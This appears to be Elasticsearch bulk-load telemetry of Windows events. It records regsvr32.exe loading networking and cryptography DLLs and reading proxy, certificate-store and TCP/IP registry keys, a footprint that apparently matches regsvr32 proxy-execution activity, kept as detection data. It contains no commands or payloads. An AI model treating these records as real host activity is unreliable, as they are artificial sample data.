{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\ws2_32.dll" , "name" : "ws2_32.dll" } , "@timestamp" : 131883573237930000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\OnDemandConnRouteHelper.dll" , "name" : "OnDemandConnRouteHelper.dll" } , "@timestamp" : 131883573237930000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\winhttp.dll" , "name" : "winhttp.dll" } , "@timestamp" : 131883573237930000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap" , "value" : "ZoneMap" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573237930000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass" , "value" : "ProxyBypass" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573237930000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName" , "value" : "IntranetName" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573237930000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet" , "value" : "UNCAsIntranet" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573237930000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect" , "value" : "AutoDetect" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573237930000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass" , "value" : "ProxyBypass" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573237930000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName" , "value" : "IntranetName" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573237930000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet" , "value" : "UNCAsIntranet" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573237930000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect" , "value" : "AutoDetect" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573237930000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\nsi.dll" , "name" : "nsi.dll" } , "@timestamp" : 131883573238080000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\mswsock.dll" , "name" : "mswsock.dll" } , "@timestamp" : 131883573238080000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\winnsi.dll" , "name" : "winnsi.dll" } , "@timestamp" : 131883573238080000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\crypt32.dll" , "name" : "crypt32.dll" } , "@timestamp" : 131883573238080000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\msasn1.dll" , "name" : "msasn1.dll" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\dpapi.dll" , "name" : "dpapi.dll" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\wintrust.dll" , "name" : "wintrust.dll" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\cryptsp.dll" , "name" : "cryptsp.dll" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\rsaenh.dll" , "name" : "rsaenh.dll" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing" , "value" : "Software Publishing" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT" , "value" : "ROOT" , "key" : "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT" , "value" : "ROOT" , "key" : "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot" , "value" : "AuthRoot" , "key" : "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root" , "value" : "Root" , "key" : "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root" , "value" : "Root" , "key" : "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\SmartCardRoot" , "value" : "SmartCardRoot" , "key" : "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\CA" , "value" : "CA" , "key" : "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\CA" , "value" : "CA" , "key" : "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA" , "value" : "CA" , "key" : "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA" , "value" : "CA" , "key" : "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root" , "value" : "Root" , "key" : "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA" , "value" : "CA" , "key" : "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Content\\CachePrefix" , "value" : "CachePrefix" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Content" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Cookies\\CachePrefix" , "value" : "CachePrefix" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Cookies" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\History\\CachePrefix" , "value" : "CachePrefix" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\History" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\dnsapi.dll" , "name" : "dnsapi.dll" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters" , "value" : "Parameters" , "key" : "HKLM\\System\\CurrentControlSet\\Services\\Tcpip" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters" , "value" : "Parameters" , "key" : "HKLM\\System\\CurrentControlSet\\Services\\Tcpip" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters" , "value" : "Parameters" , "key" : "HKLM\\System\\CurrentControlSet\\Services\\Tcpip" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\rasadhlp.dll" , "name" : "rasadhlp.dll" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters" , "value" : "Parameters" , "key" : "HKLM\\System\\CurrentControlSet\\Services\\Tcpip" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters" , "value" : "Parameters" , "key" : "HKLM\\System\\CurrentControlSet\\Services\\Tcpip" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters" , "value" : "Parameters" , "key" : "HKLM\\System\\CurrentControlSet\\Services\\Tcpip" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters" , "value" : "Parameters" , "key" : "HKLM\\System\\CurrentControlSet\\Services\\Tcpip" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238230000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\wininet.dll" , "name" : "wininet.dll" } , "@timestamp" : 131883573237930000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\FWPUCLNT.DLL" , "name" : "FWPUCLNT.DLL" } , "@timestamp" : 131883573238400000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\schannel.dll" , "name" : "schannel.dll" } , "@timestamp" : 131883573238700016 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\System\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL" , "value" : "SCHANNEL" , "key" : "HKLM\\System\\CurrentControlSet\\Control\\SecurityProviders" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238700016 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\mskeyprotect.dll" , "name" : "mskeyprotect.dll" } , "@timestamp" : 131883573238869984 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\ncrypt.dll" , "name" : "ncrypt.dll" } , "@timestamp" : 131883573238869984 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\ntasn1.dll" , "name" : "ntasn1.dll" } , "@timestamp" : 131883573238869984 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing" , "value" : "Software Publishing" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238869984 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\cryptnet.dll" , "name" : "cryptnet.dll" } , "@timestamp" : 131883573238869984 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList" , "value" : "LanguageList" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238869984 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList" , "value" : "LanguageList" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238869984 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList" , "value" : "LanguageList" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238869984 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList" , "value" : "LanguageList" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238869984 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList" , "value" : "LanguageList" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238869984 , "event" : { "category" : "registry" } }
{ "index" : { } }
